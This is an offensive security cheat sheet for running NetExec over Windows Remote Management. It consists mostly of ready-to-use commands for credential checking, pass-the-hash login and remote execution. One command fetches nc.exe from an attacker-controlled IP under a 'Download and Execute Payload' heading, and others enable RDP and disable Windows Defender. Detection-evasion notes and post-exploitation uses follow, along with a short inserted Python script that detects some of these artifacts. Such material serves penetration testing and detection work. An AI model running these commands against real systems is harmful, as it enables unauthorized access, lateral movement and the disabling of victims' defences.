# WinRM Operations with NetExec

## Overview
WinRM (Windows Remote Management, ports 5985/TCP HTTP and 5986/TCP HTTPS) is Microsoft's implementation of WS-Management. It provides PowerShell remoting capabilities. NetExec's WinRM module validates credentials and executes commands — crucially, it does not require local administrator privileges (unlike SMB -x which creates services).
WinRM is the preferred protocol for non-admin command execution on Windows targets.
## Prerequisites
- WinRM enabled on target (default on Server 2012+, often disabled on workstations)
- Valid credentials (local or domain)
- Network access to 5985/TCP (HTTP) or 5986/TCP (HTTPS)
## Credential Validation

```bash
# Validate credentials via WinRM
netexec winrm 10.10.10.5 -u user -p pass
# [+] → valid credentials with WinRM access
# [-] → invalid credentials or WinRM not enabled

# Domain context
netexec winrm 10.10.10.5 -u user -p pass -d domain.local

# Pass-the-hash
netexec winrm 10.10.10.5 -u user -H ':NTHASH'

# Local auth
netexec winrm 10.10.10.5 -u administrator -p pass --local-auth

# HTTPS (SSL)
netexec winrm 10.10.10.5 -u user -p pass --port 5986
```
## Command Execution

```bash
# Execute single command
netexec winrm 10.10.10.5 -u user -p pass -x 'whoami'
# -x -> cmd.exe command

# Execute PowerShell command
netexec winrm 10.10.10.5 -u user -p pass -X 'Get-Process | Select-Object -First 10'

# Execute on multiple targets
netexec winrm targets.txt -u user -p pass -x 'hostname && ipconfig'

# Execute with pass-the-hash
netexec winrm 10.10.10.5 -u admin -H ':NTHASH' -x 'net localgroup Administrators'
```
## Common Use Cases

### Check Local Admin Membership

```bash
netexec winrm 10.10.10.5 -u user -p pass -x 'net localgroup Administrators'
```

### Download and Execute Payload

```bash
netexec winrm 10.10.10.5 -u user -p pass -X 'Invoke-WebRequest -Uri http://10.10.14.5/nc.exe -OutFile C:\Windows\Temp\nc.exe'
```

### Enable RDP

```bash
netexec winrm 10.10.10.5 -u admin -p pass -X 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0'
```

### Disable Windows Defender

```bash
netexec winrm 10.10.10.5 -u admin -p pass -X 'Set-MpPreference -DisableRealtimeMonitoring $true'
```
## Common Pitfalls
- ⚠️ WinRM not enabled: Many organizations disable WinRM on workstations. Check SMB first to confirm credentials, then test WinRM.
- ⚠️ Remote Management Users group: Domain users are NOT in this group by default. Only local administrators and explicitly added users can use WinRM.
- ⚠️ PowerShell execution policy: If -X fails, the target may have a restrictive execution policy. Use -x for cmd.exe commands instead.
- ⚠️ Kerberos vs NTLM: WinRM prefers Kerberos authentication. If Kerberos fails (clock skew, no DC reachable), it falls back to NTLM. Pass-the-hash works because it uses NTLM.
- ⚠️ Firewall: WinRM ports (5985/5986) are often restricted to management subnets. You may need to pivot through a jump host.
## OPSEC Considerations
| Operation | Noise Level | Artifacts |
|---|---|---|
| Credential validation | Low | WinRM authentication event |
| Command execution (-x) | Medium | Process creation (4688), WinRM operational log |
| PowerShell execution (-X) | Medium | PowerShell operational log (4104), ScriptBlock logging |
| Multiple commands | High | Repeated process creation, potential AMSI hits |
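As an added illustration of the artifacts in the table above (this is not part of the original notes or of NetExec), a small Python pass over constructed event records that flags process creations hosted by the WinRM provider process and the two script-block changes shown under Common Use Cases. The simplified field names and wsmprovhost.exe as the parent process are assumptions about how the records are shaped.

```python
"""Toy detection pass over constructed Windows event records.

Flags the artifacts the OPSEC table lists: 4688 process creations whose
parent is the WinRM host process (wsmprovhost.exe), and 4104 script blocks
that carry the Defender or RDP changes shown on this page.
"""
import re

# Constructed sample events (not real logs), shaped like simplified
# Security / PowerShell-Operational records.
SAMPLE_EVENTS = [
    {"EventID": 4688, "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe",
     "CommandLine": "cmd.exe /c net localgroup Administrators"},
    {"EventID": 4688, "NewProcessName": r"C:\Windows\explorer.exe",
     "ParentProcessName": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    {"EventID": 4104, "ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"EventID": 4104, "ScriptBlockText": "Get-Process | Select-Object -First 10"},
    {"EventID": 4104, "ScriptBlockText": 'Set-ItemProperty -Path "HKLM:\\System\\CurrentControlSet'
                                         '\\Control\\Terminal Server" -Name "fDenyTSConnections" -Value 0'},
]

# Script-block patterns drawn from the commands shown on this page.
SUSPICIOUS_SCRIPT_PATTERNS = {
    "defender_realtime_disabled": re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.I),
    "rdp_enabled_via_registry": re.compile(r"fDenyTSConnections.*-Value\s+0", re.I),
}


def classify_event(event):
    """Return the detection labels for one event (empty list if nothing fired)."""
    labels = []
    eid = event.get("EventID")
    if eid == 4688:
        # Remote commands delivered over WinRM run as children of wsmprovhost.exe.
        parent = event.get("ParentProcessName", "").lower()
        if parent.endswith("\\wsmprovhost.exe"):
            labels.append("winrm_spawned_process")
    elif eid == 4104:
        text = event.get("ScriptBlockText", "")
        for label, pattern in SUSPICIOUS_SCRIPT_PATTERNS.items():
            if pattern.search(text):
                labels.append(label)
    return labels


def scan(events):
    """Map the index of each event that fired to its labels; silent events are dropped."""
    return {i: labels for i, labels in enumerate(map(classify_event, events)) if labels}


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["EventID"], labels)
```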
## Post-Exploitation Value
- Non-admin command execution → situational awareness, file transfers
- PowerShell access → in-memory tooling (Mimikatz, PowerView), script execution
- RDP enablement → GUI access for detailed enumeration
- Defender manipulation → disable protections for subsequent tooling
## Cross-References
- SMB Operations — Admin-level command execution via SMB
- MSSQL Operations — Alternative non-admin execution path
- Shell Upgrade & Stabilization — Converting WinRM to interactive sessions
- Lateral Movement — Other lateral movement techniques
## Tool References
- NetExec WinRM Documentation
- evil-winrm — Interactive WinRM shell (complementary tool)